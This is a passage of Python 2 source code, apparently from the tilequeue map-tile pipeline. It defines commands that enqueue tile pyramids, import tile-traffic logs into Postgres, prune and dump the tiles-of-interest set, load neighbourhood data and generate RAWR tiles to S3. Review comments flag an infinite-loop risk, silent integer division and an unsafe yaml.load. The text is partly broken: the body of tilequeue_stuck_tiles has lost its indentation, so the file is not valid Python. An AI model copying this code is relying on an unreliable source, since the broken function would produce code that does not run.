    logger = make_logger(cfg, 'enqueue_tiles_of_interest')
    logger.info('Enqueueing tiles of interest')
    logger.info('Fetching tiles of interest ...')
    tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
    n_toi = len(tiles_of_interest)
    logger.info('Fetching tiles of interest ... done')
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml, 'Missing rawr yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom, 'Missing rawr group-zoom'
    assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
    # default the pyramid range to [group zoom, max zoom]
    if args.zoom_start is None:
        zoom_start = group_by_zoom
    else:
        zoom_start = args.zoom_start
    if args.zoom_stop is None:
        zoom_stop = cfg.max_zoom + 1  # +1 because exclusive
    else:
        zoom_stop = args.zoom_stop
    assert zoom_start >= group_by_zoom
    assert zoom_stop > zoom_start
    ungrouped = []
    coords_at_group_zoom = set()
    for coord_int in tiles_of_interest:
        coord = coord_unmarshall_int(coord_int)
        if coord.zoom < zoom_start:
            # too shallow for the pyramid; enqueue the coordinate directly
            ungrouped.append(coord)
        if coord.zoom >= group_by_zoom:
            # snap deeper coords up to the grouping zoom; the set dedupes
            coord_at_group_zoom = coord.zoomTo(group_by_zoom).container()
            coords_at_group_zoom.add(coord_at_group_zoom)
    pyramids = coord_pyramids(coords_at_group_zoom, zoom_start, zoom_stop)
    coords_to_enqueue = chain(ungrouped, pyramids)
    queue_writer = peripherals.queue_writer
    n_queued, n_in_flight = queue_writer.enqueue_batch(coords_to_enqueue)
    logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
    logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_random_pyramids(cfg, peripherals, args):
    """enqueue random pyramids

    Overlays a gridsize x gridsize grid on the tile space at the RAWR
    group-by zoom, samples distinct tiles within each grid cell, and
    enqueues the pyramid under each sampled tile.
    """
    from tilequeue.stats import RawrTileEnqueueStatsHandler
    from tilequeue.rawr import make_rawr_enqueuer_from_cfg
    logger = make_logger(cfg, 'enqueue_random_pyramids')
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml, 'Missing rawr yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom, 'Missing rawr group-zoom'
    assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
    if args.zoom_start is None:
        zoom_start = group_by_zoom
    else:
        zoom_start = args.zoom_start
    if args.zoom_stop is None:
        zoom_stop = cfg.max_zoom + 1  # +1 because exclusive
    else:
        zoom_stop = args.zoom_stop
    assert zoom_start >= group_by_zoom
    assert zoom_stop > zoom_start
    gridsize = args.gridsize
    # the argument name contains a dash, so getattr is required
    total_samples = getattr(args, 'n-samples')
    # NOTE(review): integer division under Python 2 — any remainder of
    # total_samples over the grid is silently dropped; confirm intended
    samples_per_cell = total_samples / (gridsize * gridsize)
    tileset_dim = 2 ** group_by_zoom
    # width/height of one grid cell, measured in tiles at the group zoom
    scale_factor = float(tileset_dim) / float(gridsize)
    stats = make_statsd_client_from_cfg(cfg)
    stats_handler = RawrTileEnqueueStatsHandler(stats)
    rawr_enqueuer = make_rawr_enqueuer_from_cfg(
        cfg, logger, stats_handler, peripherals.msg_marshaller)
    for grid_y in xrange(gridsize):
        tile_y_min = int(grid_y * scale_factor)
        tile_y_max = int((grid_y+1) * scale_factor)
        for grid_x in xrange(gridsize):
            tile_x_min = int(grid_x * scale_factor)
            tile_x_max = int((grid_x+1) * scale_factor)
            # rejection-sample distinct (x, y) pairs within the cell.
            # NOTE(review): this loops forever if samples_per_cell exceeds
            # the number of distinct tiles in the cell — confirm inputs
            cell_samples = set()
            for i in xrange(samples_per_cell):
                while True:
                    rand_x = randrange(tile_x_min, tile_x_max)
                    rand_y = randrange(tile_y_min, tile_y_max)
                    sample = rand_x, rand_y
                    if sample in cell_samples:
                        continue
                    cell_samples.add(sample)
                    break
            # enqueue a cell at a time
            # the queue mapper expects to be able to read the entirety of the
            # input into memory first
            for x, y in cell_samples:
                coord = Coordinate(zoom=group_by_zoom, column=x, row=y)
                pyramid = coord_pyramid(coord, zoom_start, zoom_stop)
                rawr_enqueuer(pyramid)
def tilequeue_consume_tile_traffic(cfg, peripherals):
    """Parse a tile traffic log file and insert new records into the
    tile_traffic_v4 table.

    Only records newer than the latest timestamp already present in the
    table are inserted.  Exits the process if the log file yields no
    records.
    """
    logger = make_logger(cfg, 'consume_tile_traffic')
    logger.info('Consuming tile traffic logs ...')
    tile_log_records = None
    with open(cfg.tile_traffic_log_path, 'r') as log_file:
        tile_log_records = parse_log_file(log_file)
    if not tile_log_records:
        logger.info("Couldn't parse log file")
        sys.exit(1)
    conn_info = dict(cfg.postgresql_conn_info)
    dbnames = conn_info.pop('dbnames')
    sql_conn_pool = DBConnectionPool(dbnames, conn_info, False)
    sql_conn = sql_conn_pool.get_conns(1)[0]
    with sql_conn.cursor() as cursor:
        # insert the log records after the latest_date
        cursor.execute('SELECT max(date) from tile_traffic_v4')
        max_timestamp = cursor.fetchone()[0]
        n_coords_inserted = 0
        for host, timestamp, coord_int in tile_log_records:
            if not max_timestamp or timestamp > max_timestamp:
                coord = coord_unmarshall_int(coord_int)
                # use driver-side parameter binding instead of python
                # string interpolation: the old "'%s'" quoting broke on
                # values containing quotes and was open to SQL injection
                # via the log contents
                cursor.execute(
                    'INSERT into tile_traffic_v4 '
                    '(date, z, x, y, tilesize, service, host) VALUES '
                    '(%s, %s, %s, %s, %s, %s, %s)',
                    (timestamp, coord.zoom, coord.column, coord.row, 512,
                     'vector-tiles', host))
                n_coords_inserted += 1
        logger.info('Inserted %d records' % n_coords_inserted)
    sql_conn_pool.put_conns([sql_conn])
def emit_toi_stats(toi_set, peripherals):
    """
    Calculates new TOI stats and emits them via statsd.
    """
    # tally TOI membership per zoom level
    zoom_counts = defaultdict(int)
    for coord_int in toi_set:
        zoom_counts[coord_unmarshall_int(coord_int).zoom] += 1
    peripherals.stats.gauge('tiles-of-interest.count',
                            sum(zoom_counts.values()))
    for zoom, count in zoom_counts.items():
        peripherals.stats.gauge(
            'tiles-of-interest.by-zoom.z{:02d}'.format(zoom),
            count
        )
def tilequeue_prune_tiles_of_interest(cfg, peripherals):
    """Garden the tiles of interest set.

    Builds a new TOI from recent tile traffic recorded in a
    redshift/postgres table (subject to request-count and tile-count
    cutoffs) plus any configured "always-include" sources, then deletes
    dropped tiles from the store and enqueues newly added ones.
    """
    logger = make_logger(cfg, 'prune_tiles_of_interest')
    logger.info('Pruning tiles of interest ...')
    time_overall = peripherals.stats.timer('gardener.overall')
    time_overall.start()
    logger.info('Fetching tiles recently requested ...')
    import psycopg2
    prune_cfg = cfg.yml.get('toi-prune', {})
    tile_history_cfg = prune_cfg.get('tile-history', {})
    db_conn_info = tile_history_cfg.get('database-uri')
    assert db_conn_info, ("A postgres-compatible connection URI must "
                          "be present in the config yaml")
    redshift_days_to_query = tile_history_cfg.get('days')
    assert redshift_days_to_query, ("Number of days to query "
                                    "redshift is not specified")
    redshift_zoom_cutoff = int(tile_history_cfg.get('max-zoom', '16'))
    # flag indicating that s3 entry in toi-prune is used for s3 store
    legacy_fallback = 's3' in prune_cfg
    store_parts = prune_cfg.get('s3') or prune_cfg.get('store')
    assert store_parts, (
        'The configuration of a store containing tiles to delete must be '
        'specified under toi-prune:store or toi-prune:s3')
    # explictly override the store configuration with values provided
    # in toi-prune:s3
    if legacy_fallback:
        cfg.store_type = 's3'
        cfg.s3_bucket = store_parts['bucket']
        cfg.s3_date_prefix = store_parts['date-prefix']
        cfg.s3_path = store_parts['path']
    # request counts keyed by marshalled coordinate int
    redshift_results = defaultdict(int)
    with psycopg2.connect(db_conn_info) as conn:
        with conn.cursor() as cur:
            cur.execute("""
                select x, y, z, tilesize, count(*)
                from tile_traffic_v4
                where (date >= (current_timestamp - interval '{days} days'))
                and (z between 0 and {max_zoom})
                and (x between 0 and pow(2,z)-1)
                and (y between 0 and pow(2,z)-1)
                and (service = 'vector-tiles')
                group by z, x, y, tilesize
                order by z, x, y, tilesize
                """.format(
                days=redshift_days_to_query,
                max_zoom=redshift_zoom_cutoff
            ))
            for (x, y, z, tile_size, count) in cur:
                coord = create_coord(x, y, z)
                try:
                    tile_size_as_zoom = metatile_zoom_from_str(tile_size)
                    # tile size as zoom > cfg.metatile_zoom would mean that
                    # someone requested a tile larger than the system is
                    # currently configured to support (might have been a
                    # previous configuration).
                    assert tile_size_as_zoom <= cfg.metatile_zoom
                    tile_zoom_offset = tile_size_as_zoom - cfg.metatile_zoom
                except AssertionError:
                    # we don't want bogus data to kill the whole process, but
                    # it's helpful to have a warning. we'll just skip the bad
                    # row and continue.
                    logger.warning('Tile size %r is bogus. Should be None, '
                                   '256, 512 or 1024' % (tile_size,))
                    continue
                if tile_zoom_offset:
                    # if the tile is not the same size as the metatile, then we
                    # need to offset the zoom to make sure we enqueue the job
                    # which results in this coordinate being rendered.
                    coord = coord.zoomBy(tile_zoom_offset).container()
                    # just in case we fell off the end of the zoom scale.
                    if coord.zoom < 0:
                        continue
                # Sum the counts from the 256 and 512 tile requests into the
                # slot for the 512 tile.
                coord_int = coord_marshall_int(coord)
                redshift_results[coord_int] += count
    logger.info('Fetching tiles recently requested ... done. %s found',
                len(redshift_results))
    cutoff_cfg = prune_cfg.get('cutoff', {})
    cutoff_requests = cutoff_cfg.get('min-requests', 0)
    cutoff_tiles = cutoff_cfg.get('max-tiles', 0)
    logger.info('Finding %s tiles requested %s+ times ...',
                cutoff_tiles,
                cutoff_requests,
                )
    new_toi = set()
    # keep at most cutoff_tiles of the most-requested coordinates that
    # also meet the minimum request count
    for coord_int, count in sorted(
            redshift_results.iteritems(),
            key=operator.itemgetter(1),
            reverse=True)[:cutoff_tiles]:
        if count >= cutoff_requests:
            new_toi.add(coord_int)
    # drop the (potentially large) traffic counts now that we're done
    redshift_results = None
    logger.info('Finding %s tiles requested %s+ times ... done. Found %s',
                cutoff_tiles,
                cutoff_requests,
                len(new_toi),
                )
    for name, info in prune_cfg.get('always-include', {}).items():
        logger.info('Adding in tiles from %s ...', name)
        immortal_tiles = set()
        # each always-include entry is one of: bbox, tiles, file, bucket
        if 'bbox' in info:
            bounds = map(float, info['bbox'].split(','))
            for coord in tile_generator_for_single_bounds(
                    bounds, info['min_zoom'], info['max_zoom']):
                coord_int = coord_marshall_int(coord)
                immortal_tiles.add(coord_int)
        elif 'tiles' in info:
            tiles = map(deserialize_coord, info['tiles'])
            tiles = map(coord_marshall_int, tiles)
            immortal_tiles.update(tiles)
        elif 'file' in info:
            with open(info['file'], 'r') as f:
                immortal_tiles.update(
                    coord_marshall_int(deserialize_coord(line.strip()))
                    for line in f
                )
        elif 'bucket' in info:
            from boto import connect_s3
            from boto.s3.bucket import Bucket
            s3_conn = connect_s3()
            bucket = Bucket(s3_conn, info['bucket'])
            key = bucket.get_key(info['key'])
            raw_coord_data = key.get_contents_as_string()
            for line in raw_coord_data.splitlines():
                coord = deserialize_coord(line.strip())
                if coord:
                    # NOTE: the tiles in the file should be of the
                    # same size as the toi
                    coord_int = coord_marshall_int(coord)
                    immortal_tiles.add(coord_int)
        # Filter out nulls that might sneak in for various reasons
        immortal_tiles = filter(None, immortal_tiles)
        n_inc = len(immortal_tiles)
        new_toi = new_toi.union(immortal_tiles)
        # ensure that the new coordinates have valid zooms
        new_toi_valid_range = set()
        for coord_int in new_toi:
            coord = coord_unmarshall_int(coord_int)
            if coord_is_valid(coord, cfg.max_zoom):
                new_toi_valid_range.add(coord_int)
        new_toi = new_toi_valid_range
        logger.info('Adding in tiles from %s ... done. %s found', name, n_inc)
    logger.info('New tiles of interest set includes %s tiles', len(new_toi))
    logger.info('Fetching existing tiles of interest ...')
    tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
    n_toi = len(tiles_of_interest)
    logger.info('Fetching existing tiles of interest ... done. %s found',
                n_toi)
    logger.info('Computing tiles to remove ...')
    toi_to_remove = tiles_of_interest - new_toi
    logger.info('Computing tiles to remove ... done. %s found',
                len(toi_to_remove))
    peripherals.stats.gauge('gardener.removed', len(toi_to_remove))
    store = _make_store(cfg)
    if not toi_to_remove:
        logger.info('Skipping TOI remove step because there are '
                    'no tiles to remove')
    else:
        logger.info('Removing %s tiles from TOI and S3 ...',
                    len(toi_to_remove))
        # delete in batches of 1000 to bound the size of each store call
        for coord_ints in grouper(toi_to_remove, 1000):
            removed = store.delete_tiles(
                map(coord_unmarshall_int, coord_ints),
                lookup_format_by_extension(
                    store_parts['format']), store_parts['layer'])
            logger.info('Removed %s tiles from S3', removed)
        logger.info('Removing %s tiles from TOI and S3 ... done',
                    len(toi_to_remove))
    logger.info('Computing tiles to add ...')
    toi_to_add = new_toi - tiles_of_interest
    logger.info('Computing tiles to add ... done. %s found',
                len(toi_to_add))
    peripherals.stats.gauge('gardener.added', len(toi_to_add))
    if not toi_to_add:
        logger.info('Skipping TOI add step because there are '
                    'no tiles to add')
    else:
        logger.info('Enqueueing %s tiles ...', len(toi_to_add))
        queue_writer = peripherals.queue_writer
        n_queued, n_in_flight = queue_writer.enqueue_batch(
            coord_unmarshall_int(coord_int) for coord_int in toi_to_add
        )
        logger.info('Enqueueing %s tiles ... done', len(toi_to_add))
    if toi_to_add or toi_to_remove:
        logger.info('Setting new tiles of interest ... ')
        peripherals.toi.set_tiles_of_interest(new_toi)
        emit_toi_stats(new_toi, peripherals)
        logger.info('Setting new tiles of interest ... done')
    else:
        logger.info('Tiles of interest did not change, '
                    'so not setting new tiles of interest')
    logger.info('Pruning tiles of interest ... done')
    time_overall.stop()
def tilequeue_process_wof_neighbourhoods(cfg, peripherals):
    """Fetch WOF neighbourhood metadata and run the update processor."""
    from tilequeue.stats import RawrTileEnqueueStatsHandler
    from tilequeue.wof import make_wof_model
    from tilequeue.wof import make_wof_url_neighbourhood_fetcher
    from tilequeue.wof import make_wof_processor
    from tilequeue.rawr import make_rawr_enqueuer_from_cfg
    wof_cfg = cfg.wof
    assert wof_cfg, 'Missing wof config'
    logger = make_logger(cfg, 'wof_process_neighbourhoods')
    logger.info('WOF process neighbourhoods run started')
    # a handful of metadata URLs; five fetch threads is plenty
    n_fetch_threads = 5
    fetcher = make_wof_url_neighbourhood_fetcher(
        wof_cfg['neighbourhoods-meta-url'],
        wof_cfg['microhoods-meta-url'],
        wof_cfg['macrohoods-meta-url'],
        wof_cfg['boroughs-meta-url'],
        wof_cfg['data-prefix-url'],
        n_fetch_threads,
        wof_cfg.get('max-retries', 0)
    )
    model = make_wof_model(wof_cfg['postgresql'])
    today = datetime.date.today()
    stats_handler = RawrTileEnqueueStatsHandler(
        make_statsd_client_from_cfg(cfg))
    rawr_enqueuer = make_rawr_enqueuer_from_cfg(
        cfg, logger, stats_handler, peripherals.msg_marshaller)
    processor = make_wof_processor(
        fetcher, model, peripherals.toi, rawr_enqueuer, logger, today)
    logger.info('Processing ...')
    processor()
    logger.info('Processing ... done')
    logger.info('WOF process neighbourhoods run completed')
def tilequeue_initial_load_wof_neighbourhoods(cfg, peripherals):
    """Bulk-load WOF neighbourhoods from the local filesystem."""
    from tilequeue.wof import make_wof_initial_loader
    from tilequeue.wof import make_wof_model
    from tilequeue.wof import make_wof_filesystem_neighbourhood_fetcher
    wof_cfg = cfg.wof
    assert wof_cfg, 'Missing wof config'
    logger = make_logger(cfg, 'wof_process_neighbourhoods')
    logger.info('WOF initial neighbourhoods load run started')
    # the initial load reads many local files, so use a wide thread pool
    n_fetch_threads = 50
    fetcher = make_wof_filesystem_neighbourhood_fetcher(
        wof_cfg['data-path'],
        n_fetch_threads,
    )
    model = make_wof_model(wof_cfg['postgresql'])
    loader = make_wof_initial_loader(fetcher, model, logger)
    logger.info('Loading ...')
    loader()
    logger.info('Loading ... done')
def tilequeue_dump_tiles_of_interest(cfg, peripherals):
    """Write the current tiles of interest set to toi.txt."""
    logger = make_logger(cfg, 'dump_tiles_of_interest')
    logger.info('Dumping tiles of interest')
    logger.info('Fetching tiles of interest ...')
    toi_set = peripherals.toi.fetch_tiles_of_interest()
    n_toi = len(toi_set)
    logger.info('Fetching tiles of interest ... done')
    toi_filename = "toi.txt"
    logger.info('Writing %d tiles of interest to %s ...', n_toi, toi_filename)
    with open(toi_filename, "w") as fp:
        save_set_to_fp(toi_set, fp)
    logger.info('Writing %d tiles of interest to %s ... done',
                n_toi, toi_filename)
def tilequeue_load_tiles_of_interest(cfg, peripherals):
    """
    Given a newline-delimited file containing tile coordinates in
    `zoom/column/row` format, load those tiles into the tiles of interest.
    """
    logger = make_logger(cfg, 'load_tiles_of_interest')
    toi_filename = "toi.txt"
    logger.info('Loading tiles of interest from %s ... ', toi_filename)
    with open(toi_filename, 'r') as fp:
        new_toi = load_set_from_fp(fp)
    logger.info('Loading tiles of interest from %s ... done', toi_filename)
    n_new = len(new_toi)
    logger.info('Setting new TOI (with %s tiles) ... ', n_new)
    peripherals.toi.set_tiles_of_interest(new_toi)
    emit_toi_stats(new_toi, peripherals)
    logger.info('Setting new TOI (with %s tiles) ... done', n_new)
    logger.info('Loading tiles of interest ... done')
def tilequeue_stuck_tiles(cfg, peripherals):
"""
Check which files exist on s3 but are not in toi.
"""
store = _make_store(cfg)
format = lookup_format_by_extension('zip')
layer = 'all'
assert peripherals.toi, 'Missing toi'
toi = peripherals.toi.fetch_tiles_of_interest()
for coord in store.list_tiles(format, layer):
coord_int = coord_marshall_int(coord)
if coord_int not in toi:
print serialize_coord(coord)
def tilequeue_delete_stuck_tiles(cfg, peripherals):
    """Read coordinates from stdin and delete them from the store."""
    logger = make_logger(cfg, 'delete_stuck_tiles')
    fmt = lookup_format_by_extension('zip')
    layer = 'all'
    store = _make_store(cfg)
    logger.info('Removing tiles from S3 ...')
    total_removed = 0
    # process stdin in batches of 1000 lines
    for batch in grouper(sys.stdin, 1000):
        coords = [c for c in map(deserialize_coord, batch) if c]
        if coords:
            n_removed = store.delete_tiles(coords, fmt, layer)
            total_removed += n_removed
            logger.info('Removed %s tiles from S3', n_removed)
    logger.info('Total removed: %d', total_removed)
    logger.info('Removing tiles from S3 ... DONE')
def tilequeue_tile_status(cfg, peripherals, args):
    """
    Report the status of the given tiles in the store, queue and TOI.
    """
    logger = make_logger(cfg, 'tile_status')
    # friendly warning to avoid confusion when this command outputs nothing
    # at all when called with no positional arguments.
    if not args.coords:
        logger.warning('No coordinates given on the command line.')
        return
    # pre-load TOI to avoid having to do it for each coordinate
    toi = None
    if peripherals.toi:
        toi = peripherals.toi.fetch_tiles_of_interest()
    # TODO: make these configurable!
    tile_format = lookup_format_by_extension('zip')
    store = _make_store(cfg)
    for coord_str in args.coords:
        coord = deserialize_coord(coord_str)
        # input checking! make sure that the coordinate is okay to use in
        # the rest of the code.
        if not coord:
            logger.warning('Could not deserialize %r as coordinate', coord_str)
            continue
        if not coord_is_valid(coord):
            logger.warning('Coordinate is not valid: %r (parsed from %r)',
                           coord, coord_str)
            continue
        # now we think we probably have a valid coordinate. go look up
        # whether it exists in various places.
        logger.info("=== %s ===", coord_str)
        coord_int = coord_marshall_int(coord)
        if peripherals.inflight_mgr:
            is_inflight = peripherals.inflight_mgr.is_inflight(coord)
            logger.info('inflight: %r', is_inflight)
        if toi:
            in_toi = coord_int in toi
            # lazy %-args for consistency with the other log calls in this
            # function (the original eagerly formatted this one message)
            logger.info('in TOI: %r', in_toi)
        data = store.read_tile(coord, tile_format)
        logger.info('tile in store: %r', bool(data))
class TileArgumentParser(argparse.ArgumentParser):
    """ArgumentParser that prints full help before exiting on a parse error."""

    def error(self, message):
        # show the error first, then the complete usage, then exit code 2
        err_line = 'error: %s\n' % message
        sys.stderr.write(err_line)
        self.print_help()
        sys.exit(2)
class FakeStatsd(object):
    """A do-nothing statsd replacement used when no statsd host is set."""

    def __init__(self, *args, **kwargs):
        pass

    def _noop(self, *args, **kwargs):
        # shared no-op implementation for all counter/gauge/timing calls
        pass

    incr = _noop
    decr = _noop
    gauge = _noop
    set = _noop
    timing = _noop

    def timer(self, *args, **kwargs):
        # hand back a timer object with no-op start/stop
        return FakeStatsTimer()

    def pipeline(self):
        # statsd pipelines are context managers; reuse self for that
        return self

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        pass
class FakeStatsTimer(object):
    """Timer stand-in whose start/stop do nothing."""

    def __init__(self, *args, **kwargs):
        pass

    def start(self):
        pass

    def stop(self):
        pass
def tilequeue_process_tile(cfg, peripherals, args):
    """Render a single tile synchronously and print its JSON output.

    Debugging aid: fetches data for the given coordinate, runs the full
    processing pipeline and prints the JSON-format tile to stdout.
    """
    if not args.coord:
        print >> sys.stderr, 'Missing coord argument'
        sys.exit(1)
    coord_str = args.coord
    coord = deserialize_coord(coord_str)
    if not coord:
        print >> sys.stderr, 'Invalid coordinate: %s' % coord_str
        sys.exit(2)
    with open(cfg.query_cfg) as query_cfg_fp:
        # NOTE(review): yaml.load without an explicit Loader; fine for a
        # trusted local config file, unsafe on untrusted input
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
    output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
    formats = lookup_formats(cfg.output_formats)
    # one I/O thread per layer fetch
    io_pool = ThreadPool(len(layer_data))
    data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
    for fetch, _ in data_fetcher.fetch_tiles([dict(coord=coord)]):
        formatted_tiles, extra_data = process(
            coord, cfg.metatile_zoom, fetch, layer_data, post_process_data,
            formats, cfg.buffer_cfg, output_calc_mapping, cfg.max_zoom,
            cfg.tile_sizes)
        # can think about making this configurable
        # but this is intended for debugging anyway
        json_tile = [x for x in formatted_tiles
                     if x['format'].extension == 'json']
        assert json_tile
        json_tile = json_tile[0]
        tile_data = json_tile['tile']
        print tile_data
def tilequeue_rawr_enqueue(cfg, args):
    """command to take tile expiry path and enqueue for rawr tile generation"""
    from tilequeue.stats import RawrTileEnqueueStatsHandler
    from tilequeue.rawr import make_rawr_enqueuer_from_cfg
    msg_marshall_yaml = cfg.yml.get('message-marshall')
    assert msg_marshall_yaml, 'Missing message-marshall config'
    marshaller = make_message_marshaller(msg_marshall_yaml)
    logger = make_logger(cfg, 'rawr_enqueue')
    stats_handler = RawrTileEnqueueStatsHandler(
        make_statsd_client_from_cfg(cfg))
    enqueuer = make_rawr_enqueuer_from_cfg(
        cfg, logger, stats_handler, marshaller)
    # stream the expired tile coordinates straight into the enqueuer
    with open(args.expiry_path) as fh:
        enqueuer(create_coords_generator_from_tiles_file(fh))
def _tilequeue_rawr_setup(cfg,
                          s3_role_arn=None,
                          s3_role_session_duration_s=None):
    """Build the RAWR tile generator and its DB connection context.

    If `s3_role_arn` is non-empty then it will be used as the IAM role
    to access the S3 and `s3_role_session_duration_s` determines the S3
    session duration in seconds.

    Returns a (rawr_gen, conn_ctx) pair.
    """
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    rawr_postgresql_yaml = rawr_yaml.get('postgresql')
    assert rawr_postgresql_yaml, 'Missing rawr postgresql config'
    from raw_tiles.formatter.msgpack import Msgpack
    from raw_tiles.gen import RawrGenerator
    from raw_tiles.source.conn import ConnectionContextManager
    from raw_tiles.source import parse_sources
    from raw_tiles.source import DEFAULT_SOURCES as DEFAULT_RAWR_SOURCES
    from tilequeue.rawr import RawrS3Sink
    from tilequeue.rawr import RawrStoreSink
    import boto3
    import botocore
    # pass through the postgresql yaml config directly
    conn_ctx = ConnectionContextManager(rawr_postgresql_yaml)
    rawr_source_list = rawr_yaml.get('sources', DEFAULT_RAWR_SOURCES)
    assert isinstance(rawr_source_list, list), \
        'RAWR source list should be a list'
    assert len(rawr_source_list) > 0, \
        'RAWR source list should be non-empty'
    # a 'store' entry takes precedence over the 'sink' configuration
    rawr_store = rawr_yaml.get('store')
    if rawr_store:
        store = \
            make_store(rawr_store,
                       s3_role_arn=s3_role_arn,
                       s3_role_session_duration_s=s3_role_session_duration_s)
        rawr_sink = RawrStoreSink(store)
    else:
        rawr_sink_yaml = rawr_yaml.get('sink')
        assert rawr_sink_yaml, 'Missing rawr sink config'
        sink_type = rawr_sink_yaml.get('type')
        assert sink_type, 'Missing rawr sink type'
        if sink_type == 's3':
            s3_cfg = rawr_sink_yaml.get('s3')
            assert s3_cfg, 'Missing s3 config'
            bucket = s3_cfg.get('bucket')
            assert bucket, 'Missing rawr sink bucket'
            sink_region = s3_cfg.get('region')
            assert sink_region, 'Missing rawr sink region'
            prefix = s3_cfg.get('prefix')
            assert prefix, 'Missing rawr sink prefix'
            extension = s3_cfg.get('extension')
            assert extension, 'Missing rawr sink extension'
            tags = s3_cfg.get('tags')
            from tilequeue.store import make_s3_tile_key_generator
            tile_key_gen = make_s3_tile_key_generator(s3_cfg)
            if s3_role_arn:
                # use provided role to access S3
                assert s3_role_session_duration_s, \
                    's3_role_session_duration_s is either None or 0'
                # exchange the role for temporary credentials via STS
                session = botocore.session.get_session()
                client = session.create_client('sts')
                assume_role_object = \
                    client.assume_role(RoleArn=s3_role_arn,
                                       RoleSessionName='tilequeue_dataaccess',
                                       DurationSeconds=s3_role_session_duration_s)
                creds = assume_role_object['Credentials']
                s3_client = boto3.client('s3',
                                         region_name=sink_region,
                                         aws_access_key_id=creds['AccessKeyId'],
                                         aws_secret_access_key=creds['SecretAccessKey'],
                                         aws_session_token=creds['SessionToken'])
            else:
                s3_client = boto3.client('s3', region_name=sink_region)
            rawr_sink = RawrS3Sink(
                s3_client, bucket, prefix, extension, tile_key_gen, tags)
        elif sink_type == 'none':
            from tilequeue.rawr import RawrNullSink
            rawr_sink = RawrNullSink()
        else:
            assert 0, 'Unknown rawr sink type %s' % sink_type
    rawr_source = parse_sources(rawr_source_list)
    rawr_formatter = Msgpack()
    rawr_gen = RawrGenerator(rawr_source, rawr_formatter, rawr_sink)
    return rawr_gen, conn_ctx
# run RAWR tile processing in a loop, reading from queue
def tilequeue_rawr_process(cfg, peripherals):
    """Consume the RAWR queue and generate RAWR tiles until stopped."""
    from tilequeue.rawr import RawrTileGenerationPipeline
    from tilequeue.log import JsonRawrProcessingLogger
    from tilequeue.stats import RawrTilePipelineStatsHandler
    from tilequeue.rawr import make_rawr_queue_from_yaml
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    msg_marshall_yaml = cfg.yml.get('message-marshall')
    assert msg_marshall_yaml, 'Missing message-marshall config'
    marshaller = make_message_marshaller(msg_marshall_yaml)
    rawr_queue_yaml = rawr_yaml.get('queue')
    assert rawr_queue_yaml, 'Missing rawr queue config'
    rawr_queue = make_rawr_queue_from_yaml(rawr_queue_yaml, marshaller)
    logger = make_logger(cfg, 'rawr_process')
    rawr_gen, conn_ctx = _tilequeue_rawr_setup(cfg)
    # wire the queue, generator and sinks into the processing pipeline
    pipeline = RawrTileGenerationPipeline(
        rawr_queue, marshaller, group_by_zoom, rawr_gen,
        peripherals.queue_writer,
        RawrTilePipelineStatsHandler(peripherals.stats),
        JsonRawrProcessingLogger(logger), conn_ctx)
    pipeline()
def make_default_run_id(include_clock_time, now=None):
    """Build a default run id string from *now* (current local time when
    None): 'YYYYMMDD', or 'YYYYMMDD-HH:MM:SS' when include_clock_time is
    truthy."""
    moment = datetime.datetime.now() if now is None else now
    fmt = '%Y%m%d-%H:%M:%S' if include_clock_time else '%Y%m%d'
    return moment.strftime(fmt)
# run a single RAWR tile generation
def tilequeue_rawr_tile(cfg, args):
    """Generate the RAWR tiles for a single parent coordinate.

    The parent tile is split into job coordinates at the group-by zoom
    and each one is generated and timed individually; per-coordinate
    failures are logged and do not abort the remaining jobs.
    """
    from raw_tiles.source.table_reader import TableReader
    from tilequeue.log import JsonRawrTileLogger
    from tilequeue.rawr import convert_coord_object
    parent_coord_str = args.tile
    parent = deserialize_coord(parent_coord_str)
    assert parent, 'Invalid tile coordinate: %s' % parent_coord_str
    run_id = args.run_id
    if not run_id:
        # date-only run id groups all of today's runs together
        run_id = make_default_run_id(include_clock_time=False)
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    rawr_gen, conn_ctx = \
        _tilequeue_rawr_setup(cfg,
                              s3_role_arn=args.s3_role_arn,
                              s3_role_session_duration_s=args.
                              s3_role_session_duration_s)
    logger = make_logger(cfg, 'rawr_tile')
    rawr_tile_logger = JsonRawrTileLogger(logger, run_id)
    rawr_tile_logger.lifecycle(parent, 'Rawr tile generation started')
    parent_timing = {}
    with time_block(parent_timing, 'total'):
        job_coords = find_job_coords_for(parent, group_by_zoom)
        for coord in job_coords:
            try:
                coord_timing = {}
                with time_block(coord_timing, 'total'):
                    rawr_tile_coord = convert_coord_object(coord)
                    with conn_ctx() as conn:
                        # commit transaction
                        with conn as conn:
                            # cleanup cursor resources
                            with conn.cursor() as cur:
                                table_reader = TableReader(cur)
                                rawr_gen_timing = rawr_gen(
                                    table_reader, rawr_tile_coord)
                                coord_timing['gen'] = rawr_gen_timing
                rawr_tile_logger.coord_done(parent, coord, coord_timing)
            except Exception as e:
                # keep going: one bad job coordinate shouldn't fail the rest
                rawr_tile_logger.error(e, parent, coord)
    rawr_tile_logger.parent_coord_done(parent, parent_timing)
    rawr_tile_logger.lifecycle(parent, 'Rawr tile generation finished')
def _tilequeue_rawr_seed(cfg, peripherals, coords):
    """Enqueue the given coords as RAWR tiles without TOI filtering."""
